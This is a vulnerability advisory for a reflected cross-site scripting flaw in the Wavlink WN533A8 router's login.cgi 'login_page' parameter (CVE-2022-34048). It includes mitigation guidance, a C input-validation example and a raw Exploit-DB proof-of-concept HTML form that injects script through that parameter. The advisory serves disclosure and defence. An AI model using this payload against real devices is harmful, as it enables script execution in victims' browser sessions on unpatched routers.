Vendor: WN533A8
By: Ahmed Alroky
CVSS: 6.1 MEDIUM
CWE: 79 Cross-Site Scripting (XSS)
Product Name: WN533A8
Affected Version From: M33A8.V5030.190716
Affected Version To: M33A8.V5030.190716
Patch Exists: NO
Related CVE: CVE-2022-34048
CPE: a:wavlink:wn533a8
Metasploit:
Other Scripts:
Tags: cve2022,wavlink,xss,router,edb,cve
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Nuclei Metadata: {'max-request': 1, 'shodan-query': 'http.html:"Wavlink"', 'verified': True, 'vendor': 'wavlink', 'product': 'wn533a8_firmware'}
Platforms Tested: Windows
2020

Wavlink WN533A8 – Cross-Site Scripting (XSS)

A Cross-Site Scripting (XSS) vulnerability exists in Wavlink WN533A8 that allows an attacker to inject malicious JavaScript code into the application. It can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of the affected site. The vulnerability is due to insufficient validation of user-supplied input in the 'login_page' parameter of the 'login.cgi' script. An attacker can exploit it by sending a maliciously crafted HTTP request to the vulnerable server.

Mitigation:

Input validation should be used to prevent Cross-Site Scripting (XSS) attacks. The application should validate all input data for length, type, and syntax. All HTML metacharacters should be removed or encoded before being returned to the user.
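
The two controls described above, as an added example in C (not vendor code and not part of the original advisory): an allow-list check for a page-name parameter such as 'login_page', and an encoder for values echoed into a JavaScript string. The function names, the ".shtml" suffix rule and the 32-character limit are assumptions, and the JavaScript-string context is inferred from the shape of the PoC value, since the page does not show the response.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Allow-list check for a page-name parameter such as login_page:
 * 1 to 32 characters of [A-Za-z0-9_-] followed by ".shtml".
 * The suffix and length limit are assumptions modelled on the other
 * page fields in the PoC form (main.shtml, wiz.shtml). Returns 1 if valid. */
int is_valid_page_name(const char *s)
{
    const char *suffix = ".shtml";
    size_t len = strlen(s);
    size_t slen = strlen(suffix);

    if (len <= slen || len > 32 + slen) return 0;
    if (strcmp(s + len - slen, suffix) != 0) return 0;
    for (size_t i = 0; i < len - slen; i++) {
        unsigned char c = (unsigned char)s[i];
        if (!isalnum(c) && c != '_' && c != '-') return 0;
    }
    return 1;
}

/* Encode a value for use inside a JavaScript string literal in an HTML
 * page. Every byte that is not an ASCII letter or digit becomes \xHH, so
 * quotes, parentheses, semicolons, '<' and '/' cannot close the string or
 * the enclosing <script> element. Non-ASCII bytes are escaped byte-wise.
 * Returns the encoded length, or -1 if the output buffer is too small. */
int js_string_encode(const char *in, char *out, size_t outsz)
{
    size_t o = 0;

    if (outsz == 0) return -1;
    for (; *in; in++) {
        unsigned char c = (unsigned char)*in;
        if (isalnum(c)) {
            if (o + 1 >= outsz) return -1;   /* char + NUL must fit */
            out[o++] = (char)c;
        } else {
            if (o + 4 >= outsz) return -1;   /* \xHH + NUL must fit */
            o += (size_t)snprintf(out + o, outsz - o, "\\x%02X", (unsigned)c);
        }
    }
    out[o] = '\0';
    return (int)o;
}
```

Validation rejects the request outright; the encoder is the second layer for any value that must still be written into the page.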

Exploit-DB raw data:

# Exploit Title: Wavlink WN533A8 - Cross-Site Scripting (XSS)
# Exploit Author: Ahmed Alroky
# Author Company : AIactive
# Version: M33A8.V5030.190716
# Vendor home page : wavlink.com
# Authentication Required: No
# CVE : CVE-2022-34048
# Tested on: Windows

# Poc code
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://IP_ADDRESS/cgi-bin/login.cgi" method="POST">
      <input type="hidden" name="newUI" value="1" />
      <input type="hidden" name="page" value="login" />
      <input type="hidden" name="username" value="admin" />
      <input type="hidden" name="langChange" value="0" />
     <input type="hidden" name="ipaddr" value="196&#46;219&#46;234&#46;10" />
      <input type="hidden" name="login&#95;page" value="x"&#41;&#59;alert&#40;9&#41;&#59;x&#61;&#40;"" />
      <input type="hidden" name="homepage" value="main&#46;shtml" />
      <input type="hidden" name="sysinitpage" value="sysinit&#46;shtml" />
      <input type="hidden" name="wizardpage" value="wiz&#46;shtml" />
      <input type="hidden" name="hostname" value="59&#46;148&#46;80&#46;138" />
      <input type="hidden" name="key" value="M94947765" />
      <input type="hidden" name="password" value="ab4e98e4640b6c1ee88574ec0f13f908" />
      <input type="hidden" name="lang&#95;select" value="en" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>